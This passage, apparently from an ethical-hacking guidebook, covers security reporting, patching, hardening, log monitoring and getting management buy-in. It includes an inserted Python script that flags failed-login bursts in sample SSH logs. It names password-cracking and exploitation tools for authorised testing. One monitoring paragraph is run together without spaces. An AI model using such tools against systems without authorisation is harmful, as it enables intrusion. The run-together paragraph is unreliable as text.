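    Finding("Weak encryption ciphers being used on a marketing website", 1, 1,
            "Retire weak ciphers at the next web server maintenance"),
]


def demo() -> str:
    # Dates and test names are constructed placeholders.
    return build_report(SAMPLE_FINDINGS, ["2016-03-07", "2016-03-08"],
                        ["External port scan", "Internal vulnerability scan", "Share permission review"])


if __name__ == "__main__":
    print(demo())
```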
It always adds value if you can perform an operational assessment of IT/security processes. I recommend adding a list of general observations around weak business processes, management's support of IT and security, and so on along with recommendations for addressing each issue. You can look at this as sort of a root cause analysis.
Most people want the final report to include a summary of the findings — not everything. The last thing most people want to do is sift through a 600-page PDF file containing technical jargon that means very little to them. Many consulting firms have been known to charge megabucks for this very type of report. And they get away with it. But that doesn't make it right.
Administrators and developers need the raw data reports from the security tools. That way, they can reference the data later when they need to see specific HTTP requests/responses, details on missing patches, and so on.
As part of the final report, you might want to document behaviors you observe when carrying out your security tests. For example, are employees completely oblivious or even belligerent when you carry out an obvious social engineering attack? Does the IT or security staff completely miss technical tip-offs, such as the performance of the network degrading during testing or various attacks appearing in system log files? You can also document other security issues you observe, such as how quickly IT staff or managed service providers respond to your tests or whether they respond at all. Following the root cause analysis approach, any missing, incomplete, or not followed procedures need to be documented.
Guard the final report to keep it secure from people who are not authorized to see it. A security assessment report and the associated data and supporting files in the hands of a competitor, hacker, or malicious insider could spell trouble for the organization. Here are some ways to prevent this from happening:
Deliver the report and associated documentation and files only to those who have a business need to know.
If sending the final report electronically, encrypt all attachments, such as documentation and test results, using an encrypted Zip format or a secure cloud file-sharing service.
Plugging Security Holes
In This Chapter
Determining which vulnerabilities to address first
Patching your systems
Looking at security in a new light
After you complete your tests, you want to head down the road to greater security. However, you found some security vulnerabilities — things that need to be addressed. (I hope not too many serious ones, though!) Plugging these security holes before someone exploits them is going to require a little elbow grease. You need to come up with your game plan and decide which security vulnerabilities to address first. A few patches might be in order and possibly even some system hardening. You may need to purchase some new security technologies and might want to reevaluate your network design and security infrastructure as well. I touch on some of the critical areas in this chapter.
Turning Your Reports into Action
It might seem that the security vulnerability to address first would be obvious, but it's often not very clear. When reviewing the vulnerabilities that you find, consider the following variables:
How critical the vulnerable system is
What sensitive information or business processes are at stake
Whether the vulnerability can be fixed
How easy the vulnerability is to fix
Whether you can take the system offline to fix the problem
What time, money, and effort is involved in purchasing new hardware or software or retooling business processes to plug the holes
In Chapter 17, I cover the basic issues of determining how important and how urgent the security problem is. In fact, I provide real-world examples in Table 17-1. You should also look at security from a time management perspective and address the issues that are both important (high impact) and urgent (high likelihood). You probably don't want to try to fix the vulnerabilities that are just high impact or just high likelihood. You might have some high impact vulnerabilities that, likely, will never be exploited. Likewise, you probably have some vulnerabilities with a high likelihood of being exploited that, if they are exploited, won't really make a big difference in your business or your job. This type of human analysis and perspective will help you stand out from the scan-and-run type assessments that many people perform (often in the name of some compliance regulation) and keep you employed for some time to come!
Focus on tasks with the highest payoff first — those that are both high impact and high likelihood. This will likely be the minority of your vulnerabilities. After you plug the most critical security holes, you can go after the less important and less urgent tasks when time and money permit. For example, after you plug such critical holes as SQL injection in web applications and missing patches on important servers, you might want to reconfigure your backups with passwords, if not strong encryption, to keep prying eyes away in case your backups fall into the wrong hands.
Patching for Perfection
Do you ever feel like all you do is patch your systems to fix security vulnerabilities? If your answer is yes to this question, good for you — at least you're doing it! If you constantly feel pressure to patch your systems the right way but can't seem to find time — at least it's on your radar. Many IT professionals and their managers don't even think about proactively patching their systems until after a breach occurs. Just look at the research in the Verizon Data Breach Investigations Report (among others). Patch management is a huge security failure across organizations in all industries. If you're reading this book, you're obviously concerned about security and are hopefully way past that.
Whatever you do, whatever tool you choose, and whatever procedures work best in your environment, keep your systems patched! This goes for operating systems, web servers, databases, mobile apps, and even firmware on your network firewalls, routers, and switches.
Patching is avoidable but inevitable. The only real solution to eliminating the need for patches is developing secure software in the first place, but that's not going to happen anytime soon, if ever. Software is just too complex for it to be perfect. A large portion of security incidents can be prevented with some good patching practices, so there's simply no reason not to have a solid patch management process in place.
Patch management
If you can't keep up with the deluge of security patches for all your systems, don't despair; you can still get a handle on the problem. Here are my basic tenets for applying patches to keep your systems secure:
Make sure all the people and departments that are involved in applying patches on your organization's systems are on the same page and follow the same procedures. Have formal and documented procedures in place for these critical processes:
Obtaining patch alerts from your vendors, including third-party patches for Adobe, Java, and so on, which are often overlooked (and often the most critical)
Assessing which patches affect your systems
Determining when to apply patches
Make it policy and have procedures in place for testing patches before you apply them to your production servers. Testing patches after you apply them isn't as big of a deal on workstations, but servers are a different story. Many patches have "undocumented features" and subsequent unintended side effects — believe me, I've experienced this before. An untested patch is an invitation for system termination!
Patch automation
The following sections describe the various patch deployment tools you can use to lower the burden of constantly having to keep up with patches.
Commercial tools
I recommend a robust patch-automation application, especially if these factors are involved:
A large network
A network with a multitude of operating systems (Windows, Linux, Mac OS X, and so on)
A lot of third-party software applications, such as Adobe and Java
More than a few dozen computers
Be sure to check out these patch-automation solutions:
Ecora Patch Manager (www.ecora.com/ecora/products/patchmanager.asp)
GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)
IBM BigFix (www-03.ibm.com/security/bigfix)
Shavlik Patch (www.shavlik.com/products/patch)
Free tools
Use one of these free tools to help with automated patching:
Windows Server Update Services (WSUS) (http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx)
Windows Update, which is built into Microsoft Windows operating systems
Microsoft Baseline Security Analyzer (MBSA) (www.microsoft.com/technet/security/tools/mbsahome.mspx)
The built-in patching tools for Linux-based systems (such as Yellowdog Updater, Modified [yum] and YaST Online Update)
Hardening Your Systems
In addition to patching your systems, you have to make sure your systems are hardened (locked down) from the security vulnerabilities that patches can't fix. I've found that many people stop with patching, thinking their systems are secure, but that's just not the case. Throughout the years, I've seen network administrators ignore recommended hardening practices from such organizations as the National Institute of Standards and Technology (NIST) (http://csrc.nist.gov/publications/PubsSPs.html) and the Center for Internet Security (www.cisecurity.org), leaving many security holes wide open. However, I'm a true believer that hardening systems from malicious attack is not foolproof, either. Because every system and every organization's needs are different, there is no one-size-fits-all solution, so you have to strike a balance and not rely on any single option too much.
It's a good idea to rescan your systems for vulnerabilities once your patches are applied.
Paying the piper
I was once involved in an incident response project that involved over 10,000 Windows servers and workstations being infected with targeted malware. Advanced malware had taken a foothold. The business found the infection early on and thought the IT team had cleaned it up. Time passed, and they realized a year or so later they had not cleaned up the entire mess. The malware had come back with a vengeance to the point where their entire network was essentially under surveillance by foreign, state-sponsored, criminal hackers.
After dozens of people spent many hours getting to the root of the problem, it was determined that the IT department had not done what it should've been doing in terms of patching and hardening its systems from the get-go. On top of that, there was a serious communication breakdown between IT and other departments, including security, the help desk, and business operations. It was a case of too little too late that ended up getting a very large business into a very large bind. The lesson here is that improperly secured systems can create a tremendous burden on your business.
This book presents hardening countermeasures that you can implement for your network, computers, and even physical systems and people. I find these countermeasures work the best for the respective systems.
Implementing at least the basic security practices is critical. Whether installing a firewall on the network or requiring users to have strong passwords via a Windows domain GPO — you must address the basics if you want any modicum of security. Beyond patching, if you follow the countermeasures I document, add the other well-known security practices for network systems (routers, servers, workstations, and so on) that are freely available on the Internet, and perform ongoing security tests, you can rest assured that you're doing your best to keep your organization's information secure.
Assessing Your Security Infrastructure
A review of your overall security infrastructure can add oomph to your systems:
Look at how your overall network is designed. Consider organizational issues, such as whether policies are in place, maintained, or even taken seriously. Physical issues count as well. Do members of management have buy-in on information security and compliance, or do they simply shrug the measure off as an unnecessary expense or barrier to conducting business?
Map your network by using the information you gather from the security tests in this book. Updating existing documentation is a major necessity. Outline IP addresses, running services, and whatever else you discover. Draw your network diagram — network design and overall security issues are a whole lot easier to assess when you can work with them visually. Although I prefer to use a technical drawing program, such as Visio or Cheops-ng (http://cheops-ng.sourceforge.net), to create network diagrams, such a tool isn't necessary. You can draw out your map on a whiteboard like many people do, and that's just fine.
Be sure to update your diagrams when your network changes or at least once every year or so.
Think about your approach to correcting vulnerabilities and increasing your organization's overall security. Are you focusing all your efforts on the perimeter and not on a layered security approach? Think about how most convenience stores and banks are protected. Security cameras focus on the cash registers, teller computers, and surrounding areas — not just on the parking lot or entrances. Look at security from a defense-in-depth perspective. Make sure that several layers of security are in place in case one measure fails, so the attacker must go through other barriers to carry out a successful attack.
Think about security policies and procedures at an organizational level. Document what security policies and procedures are in place and whether they're effective. No organization is immune to gaps in this area.
Look at the overall security culture within your organization and see what it looks like from an outsider's perspective. What would customers or business partners think about how your organization treats their sensitive information?
Looking at your security from a high-level and nontechnical perspective gives you a new outlook on security holes. It takes some time and effort at first, but after you establish a baseline of security, it's much easier to manage new threats and vulnerabilities.
Managing Security Processes
In This Chapter
Automating tasks
Watching for misbehavior
Outsourcing your security testing
Keeping security on everyone's mind
Information security is an ongoing process that you must manage effectively to be successful. This management goes beyond periodically applying patches and hardening systems. Performing your security tests repeatedly is critical; information security vulnerabilities emerge constantly. To put it another way, security tests are just a snapshot of your overall information security, so you have to perform your tests continually to keep up with the latest issues. Ongoing vigilance is required not only for compliance with various laws and regulations but also for minimizing business risks related to your information systems.
Automating the Ethical Hacking Process
You can run a large portion of the following ethical hacking tests in this book automatically:
Ping sweeps and port scans to show what systems are available and what's running
Password cracking tests to attempt access to external web applications, remote access servers, and so on
Vulnerability scans to check for missing patches, misconfigurations, and exploitable holes
Exploitation of vulnerabilities (to an extent, at least)
You must have the right tools to automate these tests, for example:
Some commercial tools can set up periodic assessments and create nice reports for you without any hands-on intervention — just a little setup and scheduling time up front. This is why I like many of the commercial — and mostly automated — security testing tools, such as Nexpose and AppSpider. The automation you get from these tools often helps justify the price, especially because you don't have to be up at 2:00 a.m. or on call 24 hours a day to monitor the testing.
Standalone security tools, such as Nmap, John the Ripper, and Aircrack-ng, are great but they aren't enough. You can use the Windows Task Scheduler and AT commands on Windows systems and cron jobs on Linux-based systems, but manual steps and human intellect are still required.
Links to these tools and many others are located in the Appendix.
Certain tests and phases, such as enumeration of new systems, various web application tests, social engineering, and physical security walkthroughs, simply cannot be set on autopilot. You have to be involved.
Even the smartest computer "expert system" can't accomplish security tests. Good security requires technical expertise, experience, and good old-fashioned common sense.
MonitoringMaliciousUseMonitoringsecurity-relatedeventsisessentialforongoingsecurityefforts.Thiscanbeasbasicandmundaneasmonitoringlogfilesonrouters,firewalls,andcriticalserverseveryday.Advancedmonitoringmightincludeimplementingasecurityincidentandeventmanagement(SIEM)systemtomonitoreverylittlethingthat’shappeninginyourenvironment.Acommonmethodistodeployanintrusionpreventionsystem(IPS)ordatalossprevention(DLP)systemandmonitorformaliciousbehavior.
The problem with monitoring security-related events is that humans find it very boring and very difficult to do effectively. Each day, you could dedicate a time—such as first thing in the morning—to checking your critical log files from the previous night or weekend to ferret out intrusions and other computer and network security problems. However, do you really want to subject yourself or someone else to that kind of torture?
Manually sifting through log files probably isn’t the best way to monitor the system. Consider the following drawbacks:
Finding critical security events in system log files is difficult, if not impossible. It’s just too tedious a task for the average human to accomplish effectively. Depending on the type of logging and security equipment you use, you might not even detect some security events, such as IPS evasion techniques and exploits carried out over allowed ports on the network.
Instead of panning through all your log files for hard-to-find intrusions, here’s what I recommend:
Enable system logging where it’s reasonable and possible. You don’t necessarily need to capture all computer and network events, but you should definitely look for certain obvious ones, such as login failures, policy changes, and unauthorized file access. Log security events using syslog, a write once read many (WORM) device, or another central server on your network. Do not keep logs on the local host, if possible, to help prevent the bad guys from tampering with log files to cover their tracks.
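As an added example that is not from the book, here is the kind of check a central syslog feed makes possible: a small Python script that scans constructed OpenSSH-style auth log lines for a burst of login failures from one source and notes whether a successful login from that source followed. The sample lines, the year supplied for the timestamps, and the thresholds are all constructed assumptions.

```python
"""Scan syslog-style SSH auth lines for bursts of login failures.

Added example, not from the book: it automates the "look for obvious
events such as login failures" advice over a central log feed. The log
lines, the year, and the thresholds below are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in classic syslog/OpenSSH format (no year in the stamp).
SAMPLE_LOG = """\
Mar 10 02:14:01 srv1 sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Mar 10 02:14:03 srv1 sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 51130 ssh2
Mar 10 02:14:05 srv1 sshd[4121]: Failed password for root from 203.0.113.7 port 51140 ssh2
Mar 10 02:14:09 srv1 sshd[4121]: Failed password for root from 203.0.113.7 port 51151 ssh2
Mar 10 02:14:12 srv1 sshd[4121]: Failed password for root from 203.0.113.7 port 51160 ssh2
Mar 10 02:14:15 srv1 sshd[4130]: Accepted password for root from 203.0.113.7 port 51170 ssh2
Mar 10 08:30:41 srv1 sshd[5002]: Failed password for alice from 198.51.100.12 port 40001 ssh2
Mar 10 08:31:02 srv1 sshd[5003]: Accepted publickey for alice from 198.51.100.12 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_line(line, year=2016):
    """Return a dict for an sshd auth line, or None for anything else.

    Syslog timestamps carry no year, so one is supplied (constructed here).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    stamp = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": stamp, "host": m["host"], "result": m["result"],
            "user": m["user"], "src": m["src"]}


def find_failure_bursts(lines, threshold=5, window=timedelta(minutes=5)):
    """Alert once per source that logs `threshold` failures within `window`.

    A later successful login from an alerted source is recorded on the
    alert, because "many failures, then a success" is exactly the pattern
    someone eyeballing the file the next morning is most likely to miss.
    """
    recent = defaultdict(list)      # src -> timestamps of recent failures
    alerts = {}                     # src -> alert dict, in detection order
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                # not an sshd auth event; ignore it
        src = ev["src"]
        if ev["result"] == "Failed":
            times = recent[src]
            times.append(ev["ts"])
            # Slide the window: forget failures older than `window`.
            while ev["ts"] - times[0] > window:
                times.pop(0)
            if len(times) >= threshold and src not in alerts:
                alerts[src] = {"src": src, "failures": len(times),
                               "first": times[0], "last": ev["ts"],
                               "success_after": False, "success_user": None}
        elif src in alerts:         # an Accepted login from a flagged source
            alerts[src]["success_after"] = True
            alerts[src]["success_user"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for a in find_failure_bursts(SAMPLE_LOG.splitlines()):
        tail = ("then SUCCEEDED as %s" % a["success_user"]
                if a["success_after"] else "")
        print(f"{a['src']}: {a['failures']} failures "
              f"{a['first']:%H:%M:%S}-{a['last']:%H:%M:%S} {tail}")
```

Feeding it the tail of a central auth log (or the output of a WORM device) from cron is a few lines of glue; the same sliding-window shape works for the other "obvious" events the text names, such as policy changes or denied file access, by swapping the regex.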
The following are a couple of good solutions to the security-monitoring dilemma:
Purchase an event-logging system. A few low-priced yet effective solutions are available, such as GFI EventsManager (www.gfi.com/products-and-solutions/network-security-solutions/gfi-eventsmanager). Typically, lower-priced event-logging systems support only one OS platform—Microsoft Windows is the most common. Higher-end solutions, such as HP ArcSight Logger (www8.hp.com/us/en/software-solutions/arcsight-logger-log-management), offer both log management across various platforms and event correlation to help track down the source of security problems and the various systems affected during an incident.
Outsource security monitoring to a third-party managed security services provider (MSSP) in the cloud. Dozens of MSSPs were around during the Internet boom, but only a few big ones remain, such as Dell SecureWorks (www.secureworks.com) and Alert Logic (www.alertlogic.com). These firms are now considered cloud service providers, and the value in outsourcing security monitoring is that they often have facilities and tools that you would likely not be able to afford and maintain. They also have analysts working around the clock and have the security experience and knowledge they gain from other customers to share with you.
When these cloud service providers discover a security vulnerability or intrusion, they can usually address the issue immediately, often without your involvement. I recommend at least checking whether third-party firms and their services can free some of your time and resources so that you can focus on other things. Just don’t depend solely on their monitoring efforts; a cloud service provider may have trouble catching insider abuse, social engineering attacks, and web application exploits that are carried out over secured sessions (i.e., HTTPS). You still need to be involved.
Outsourcing Security Assessments
Outsourcing your security assessments is very popular and a great way for organizations to get an unbiased third-party perspective of their information security. Outsourcing allows you to have a checks-and-balances system that clients, business partners, auditors, and regulators like to see.
Outsourcing ethical hacking can be expensive. Many organizations spend tens of thousands of dollars—often more—depending on the testing needed. However, doing all this yourself isn’t cheap—and quite possibly it isn’t as effective, either!
A lot of confidential information is at stake, so you must trust your outside consultants and vendors. Consider the following questions when looking for an independent expert or vendor to partner with:
Is your security provider on your side or a third-party vendor’s side? Is the provider trying to sell you products, or is the provider vendor neutral? Many providers might try to make a few more dollars off the deal by recommending products and services from vendors they partner with, which might not be necessary for your needs. Make sure that these potential conflicts of interest aren’t bad for your budget and your business.
What other IT or security services does the provider offer? Does the provider focus solely on security? Having an information security specialist do this testing for you is often better than working with an IT generalist organization. After all, would you hire a general corporate lawyer to help you with a patent, a family practitioner to perform surgery, or a handyman to rewire your house?
What are your provider’s hiring and termination policies? Look for measures the provider takes to minimize the chances that an employee will walk off with your sensitive information.
Does the provider understand your business needs? Have the provider repeat the list of your needs and put them in writing to make sure you’re both on the same page.
How well does the provider communicate? Do you trust the provider to keep you informed and follow up with you in a timely manner?
Do you know exactly who will perform the tests? Will one person do the testing, or will subject-matter experts focus on the different areas?
Does the provider have the experience to recommend practical and effective countermeasures to the vulnerabilities found? The provider shouldn’t just hand you a thin report and say, “Good luck with all that!” You need realistic solutions.
What are the provider’s motives? Do you get the impression that the provider is in business to make a quick buck off the services, with minimal effort and value added, or is the provider in business to build loyalty with you and establish a long-term relationship?
Finding a good organization to work with long-term will make your ongoing efforts much simpler. Ask for several references and sample sanitized deliverables (that is, reports that don’t contain sensitive information) from potential providers. If the organization can’t produce these without difficulty, look for another provider.
Your provider should have its own contract for you that includes mutual nondisclosure verbiage. Make sure you both sign this to help protect your organization.
Thinking about hiring a reformed hacker? Former hackers—I’m referring to the black hat hackers who have hacked into computer systems in the past and ended up serving time in prison—can be very good at what they do. Many people swear by hiring reformed hackers to do their testing. Others compare this to hiring the proverbial fox to guard the henhouse. If you’re thinking about bringing in a former (un)ethical hacker to test your systems, consider these issues:
Do you really want to reward malicious behavior with your organization’s business?
A hacker claiming to be “reformed” doesn’t mean he or she is. There could be deep-rooted psychological issues or character flaws you’re going to have to contend with. Buyer beware!
Information gathered and accessed during security assessments is some of the most sensitive information your organization possesses. If this information gets into the wrong hands—even ten years down the road—it could be used against you. Some hackers and reformed criminals hang out in tight social groups. You might not want your information shared in their circles.
That said, everyone deserves a chance to explain what happened in the past. Zero tolerance is senseless. Listen to his or her story and use common-sense discretion as to whether you trust the person to help you. The supposed black hat hacker actually might have been a gray hat hacker or a misguided white hat hacker who fits well in your organization.
Instilling a Security-Aware Mindset
Your network users are often your first and last line of defense. Make sure your ethical hacking efforts and the money spent on your information security initiatives aren’t wasted because a simple employee slip-up gave a malicious attacker the keys to the kingdom.
The following elements can help establish a security-aware culture in your organization:
Make security awareness and ongoing training an active process among all employees and users on your network, including management and contractors. One-time training such as when employees are initially hired is not enough. Awareness and training must be periodic and consistent to ensure your security messages are kept at the top of people’s minds.
Treat awareness and training programs as a long-term business investment. Security awareness programs don’t have to be expensive. You can buy posters, mouse pads, screensavers, pens, and sticky notes to help keep security on everyone’s mind. Some creative solutions vendors are Greenidea, Inc. (www.greenidea.com), Security Awareness, Inc. (www.securityawareness.com), and my favorite (because of its founder, Winn Schwartau, who’s a hilarious guy who’s not afraid to tell it like it is) The Security Awareness Company (www.thesecurityawarenesscompany.com).
Get the word on security out to management! If you keep members of management in the dark on what you’re doing, they’ll likely never be on your side. I cover getting security buy-in in Chapter 20.
Align your security message with your audience and keep it as nontechnical as possible. The last thing you want to do is unload a bunch of geek-speak on people who have no clue what you’re talking about. You’ll end up with the opposite of the effect you’re going for. Put your messages in terms of each group you’re speaking to: how security impacts them and how they can help.
Lead by example. Show that you take security seriously and offer evidence that helps prove that everyone else should, too.
If you can get the ear of management and users and put forth enough effort to make security a priority day after day, you can help shape your organization’s culture. It takes work but it can provide security value beyond your wildest imagination. I’ve seen the difference it makes!
Keeping Up with Other Security Efforts
Ethical hacking via ongoing security assessment is not the be-all and end-all solution to information security. It will not guarantee security, but it’s certainly a great start. This testing must be integrated as part of an overall information security program that includes
Higher-level information risk assessments
Strong security policies and standards that are enforced and properly adhered to
Solid incident response and business continuity plans
Effective security awareness and training initiatives
These efforts might require hiring more staff or outsourcing more security help as well.
Don’t forget about formal training for yourself and any colleagues who are helping you. You have to educate yourself consistently to stay on top of the security game. There are great conferences, seminars, and online resources for this that I outline in the Appendix.
The Part of Tens
Visit www.dummies.com/extras/hacking for great Dummies content online.
In this part… Well, here’s the end of the road, so to speak. In this part, I’ve compiled top-ten lists of what I believe are the absolute critical success factors to make your security testing—and information security in general—work in your organization. Bookmark, dog-ear, or do whatever you need to do with these pages so you can refer to them in the future. This is the meat of what you need to know about information security, compliance, and managing information risks—even more so than the technical tests and countermeasures I’ve covered thus far. Read it, study it, and make it happen. You can do it!
In addition, the Appendix contains a listing of my favorite security testing tools and resources that I’ve covered (and more), broken down into various categories for easy reference.
Ten Tips for Getting Security Buy-In
Dozens of key steps exist for obtaining the buy-in and sponsorship that you need to support your security testing efforts. In this chapter, I describe the top ten I find to be the most effective.
Cultivate an Ally and a Sponsor
Although recent breaches and compliance pressures are helping push things along, selling security to management isn’t something you want to tackle alone. Get an ally—preferably your direct manager or someone at that level or higher in the organization. Choose someone who understands the value of security testing as well as information security in general. Although this person might not be able to speak for you directly, he or she can be seen as an unbiased sponsor and can give you more credibility.
Don’t Be a FUDdy Duddy
Sherlock Holmes said, “It is a capital mistake to theorize before one has data.” To make a good case for information security and the need for vulnerability testing, support your case with relevant data. However, don’t blow stuff out of proportion for the sake of stirring up fear, uncertainty, and doubt (FUD). Managers worth their salt can see right through that. Focus on educating management with practical advice. Rational fears proportional to the threat are fine. Just don’t take the Chicken Little route, claiming that the sky is falling with everything all the time. That’s tiring to those outside of IT and security and will only hurt you over the long haul.
Demonstrate How the Organization Can’t Afford to Be Hacked
Show how dependent the organization is on its information systems. Create what-if scenarios—sort of a business impact assessment—to show what can happen, how the organization’s reputation can be damaged, and how long the organization can go without using the network, computers, and data. Ask upper-level managers what they would do without their computer systems and IT personnel—or what they’d do if sensitive business or client information was compromised. Show real-world anecdotal evidence of breaches, including malware, physical security, and social engineering issues, but be positive about it. Don’t approach management negatively with FUD. Rather, keep them informed on serious security happenings. Odds are they’re already reading about these things in major business magazines and newspapers. Figure out what you can do to apply those stories to your situation. To help management relate, find stories regarding similar businesses, competitors, or industries. (A good resource is the Privacy Rights Clearinghouse Chronology of Data Breaches at www.privacyrights.org/data-breach.) The annual Verizon Data Breach Investigations Report (www.verizonenterprise.com/DBIR), among others, is also a great resource. Let the facts speak for themselves.
Google and Bing are great tools to find practically everything you need regarding information security breaches.
Show management that the organization does have what a hacker wants. A common misconception among those ignorant about information security threats and vulnerabilities is that their organization or network is not really at risk. Be sure to point out the potential costs from damage caused by hacking, such as:
Missed opportunity costs
Exposure of intellectual property
Liability issues
Legal costs and judgments
Compliance-related fines
Criminal punishments
Lost productivity
Clean-up time and incident response costs
Replacement costs for lost, exposed, or damaged information or systems
Costs of fixing a tarnished reputation (it can take a lifetime to build a reputation and mere minutes for it to go away)
Outline the General Benefits of Security Testing
In addition to the potential costs listed in the preceding section, talk about how proactive testing can help find security vulnerabilities in information systems that normally might be overlooked. Tell management that security testing in the context of ethical hacking is a way of thinking like the bad guys so that you can protect yourself from them—the “know your enemy” mindset from Sun Tzu’s The Art of War.
Show How Security Testing Specifically Helps the Organization
Document benefits that support the overall business goals:
Demonstrate how security doesn’t have to be ultra-expensive and can save the organization money in the long run.
Security is much easier and cheaper to build in upfront than to add on later. Security doesn’t have to be inconvenient or hinder productivity if it’s done properly.
Discuss how new products or services can be offered for a competitive advantage if secure information systems are in place.
State and federal privacy and security regulations are met.
Business partner and customer requirements are satisfied.
Managers and the company come across as business-worthy in the eyes of customers and business partners. A solid security testing program and the appropriate remediation process show that the organization is protecting sensitive customer and business information.
Outline the compliance and audit benefits of in-depth security testing.
Get Involved in the Business
Understand the business—how it operates, who the key players are, and what politics are involved:
Go to meetings to see and be seen. This can help prove that you’re concerned about the business.
Be a person of value who’s interested in contributing to the business.
Know your opposition. Again, use the “know your enemy” mentality—if you understand the people you’re dealing with internally, along with their potential objections, buy-in is much easier to get. This goes not only for management but also your peers and practically every user on the network.
Establish Your Credibility
I think one of the biggest impediments holding IT and security professionals back is people not “getting” us. Your credibility is all you’ve got. Focus on these four characteristics to build it and maintain it:
Be positive about the organization and prove that you really mean business. Your attitude is critical.
Empathize with managers and show them that you understand the business side and what they’re up against.
Determine ways that you can help others get what they need.
To create any positive business relationship, you must be trustworthy. Build that trust over time, and selling security will be much easier.
Speak on Management’s Level
As cool as it sounds, no one outside of IT and security is really that impressed with techie talk. One of the best ways to limit or reduce your credibility is to communicate with everyone in this fashion. Talk in terms of the business. Talk in terms of what your specific audience needs to hear. Otherwise, odds are great that it’ll go right over their heads.
I’ve seen countless IT and security professionals lose upper-level managers as soon as they start speaking. A megabyte here; stateful inspection there; packets, packets everywhere! Bad idea. Relate security issues to everyday business processes, job functions, and overall goals. Period.
Show Value in Your Efforts
Here’s where the rubber meets the road. If you can demonstrate that what you’re doing offers business value on an ongoing basis, you can maintain a good pace and not have to constantly plead to keep your security testing program going. Keep these points in mind:
Document your involvement in IT and information security, and create ongoing reports for management regarding the state of security in the organization. Give management examples of how the organization’s systems are, or will be, secured from attacks.
Outline tangible results as a proof of concept. Show sample vulnerability assessment reports you’ve run on your systems or from the security tool vendors.
Treat doubts, concerns, and objections by management and users as requests for more information. Find the answers and go back armed and ready to prove your own worthiness.
Be Flexible and Adaptable
Prepare yourself for skepticism and rejection. Even as hot as security is today, it still happens, especially with upper-level managers such as CFOs and CEOs, who are often disconnected from IT and security in the organization. A middle-management structure that lives to create complexity is a party to the problem as well.
Don’t get defensive. Security is a long-term process, not a short-term product or single assessment. Start small—use a limited amount of resources, such as budget, tools, and time, and then build the program over time.
Studies have found that new ideas presented casually and without pressure are considered and have a higher rate of acceptance than ideas that are forced on people under a deadline. Just as with a spouse or colleagues at work, if you focus on and fine-tune your approach—at least as much as you focus on the content of what you’re going to say—you can often get people on your side, and in return, get a lot more accomplished with your security program.
Ten Reasons Hacking Is the Only Effective Way to Test
Approaching your security testing from the perspective of ethical hacking is not just for fun or show. For numerous business reasons, it’s the only effective way to find the security vulnerabilities that matter in your organization.
The Bad Guys Think Bad Thoughts, Use Good Tools, and Develop New Methods
If you’re going to keep up with external attackers and malicious insiders, you have to stay current on the latest attack methods and tools that they’re using. I cover some of the latest tricks, techniques, and tools throughout this book.
IT Governance and Compliance Are More than High-Level Checklist Audits
With all the government and industry regulations in place, your business likely doesn’t have a choice in the matter. You have to address security. The problem is that being compliant with these laws and regulations doesn’t automatically mean your network and information are secure. The Payment Card Industry Data Security Standard (PCI DSS) comes to mind here. There are countless businesses running their vulnerability scans and answering their self-assessment questionnaires assuming that that’s all that’s needed to manage their information security programs. You have to take off the checklist audit blinders and move from a compliance-centric approach to a threat-centric approach. Using the tools and techniques covered in this book enables you to dig deeper into your business’s true vulnerabilities.
Hacking Complements Audits and Security Evaluations
No doubt, someone in your organization understands higher-level security audits better than this ethical hacking stuff. However, if you can sell that person on more in-depth security testing and integrate it into existing security initiatives (such as internal audits and compliance spot checks), the auditing process can go much deeper and improve your outcomes. Everyone wins.
Customers and Partners Will Ask, ‘How Secure Are Your Systems?’
Many businesses now require in-depth security assessments of their business partners. The same goes for certain customers. The bigger companies almost always want to know how secure their information is while being processed or stored in your environment. You cannot rely on data center audit reports such as the commonly referenced SSAE 16 Service Organizational Controls (SOC) 2 standard for data center security audits. The only way to definitively know where things stand is to use the methods and tools I cover in this book.
The Law of Averages Works Against Businesses
Information systems are becoming more complex by the day. Literally. With the cloud, virtualization, and mobile being front and center in most enterprises, it’s getting more and more difficult for IT and security managers to keep up. It’s just a matter of time before these complexities work against you and in the bad guys’ favor. A criminal hacker needs to find only one critical flaw to be successful. You have to find them all. If you’re going to stay informed and ensure that your critical business systems and the sensitive information they process and store stay secure, you have to look at things with a malicious mindset and do so periodically and consistently over time, not just once every now and then.
Security Assessments Improve the Understanding of Business Threats
You can say passwords are weak or patches are missing, but actually exploiting such flaws and showing the outcome are quite different matters. There’s no better way to prove there’s a problem and motivate management to do something about it than by showing the outcomes of the testing methods that I outline in this book.
If a Breach Occurs, You Have Something to Fall Back On
In the event a malicious insider or external attacker still breaches your security, your business is sued, or your business falls out of compliance with laws or regulations, the management team can at least demonstrate that it was performing its due care to uncover security risks through the proper testing. A related area that can be problematic is knowing about a problem and not fixing it. The last thing you need is a lawyer and his expert witness pointing out how your business was lax in the area of information security testing or follow-through. That’s a road you don’t want to go down.
In-Depth Testing Brings Out the Worst in Your Systems
Someone walking around doing a self-assessment or high-level audit can find security “best practices” you’re missing, but he isn’t going to find most of the security flaws that in-depth security vulnerability and penetration testing is going to uncover. The testing methods I outline in this book will bring out the warts and all.
Combining the Best of Penetration Testing and Vulnerability Assessments Is What You Need
Penetration testing is rarely enough to find everything in your systems because the scope of traditional penetration testing is simply too limited. The same goes for vulnerability assessments, especially those that mostly involve basic vulnerability scans. When you combine both, you get the most bang for your buck.
Proper Testing Can Uncover Weaknesses That Might Go Overlooked for Years
Performing the proper security assessments not only uncovers technical, physical, and human weaknesses, but it can also reveal problems with IT and security operations, such as patch management, change management, and lack of user awareness, which may not be found otherwise or until it’s too late.
Ten Deadly Mistakes
Making the wrong choices in your security testing can wreak havoc on your work, possibly even your career. In this chapter, I discuss ten potential pitfalls to be keenly aware of when performing your security assessment work.
Not Getting Prior Approval
